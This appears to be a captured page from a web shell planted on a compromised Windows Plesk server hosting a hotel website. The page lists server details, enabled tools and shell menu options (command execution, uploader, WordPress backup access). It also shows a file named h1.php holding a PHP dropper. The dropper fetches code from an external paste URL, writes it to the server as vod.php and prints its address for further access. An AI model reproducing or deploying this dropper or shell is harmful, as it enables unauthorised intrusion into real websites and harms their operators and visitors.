ava
Windows NT A2NWVPWEB058 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
[ MySQL:
OFF
][ Curl:
ON
][ Wget:
OFF
][ Perl:
ON
][ Compiler:
OFF
]
Disable Function:
NONE
[ Jumping Backup Wordpress ]
[ MySQL Interface ]
[ Shell Command ]
[ Uploader ]
G:
/
PleskVhosts
/
cwh030.com
/
m.rodewayinncorona.com
/
App_log
/
Filename:
h1.php
<?php $url = 'https://rentry.co/5aqgugks/raw'; $filename = 'vod.php'; $file_content = file_get_contents($url); if ($file_content !== false) { file_put_contents($filename, $file_content); $server_url = "http://$_SERVER[HTTP_HOST]" . dirname($_SERVER['SCRIPT_NAME']); echo "<ova>$server_url/$filename<ova>"; } else { echo "Failed to download the file."; } ?>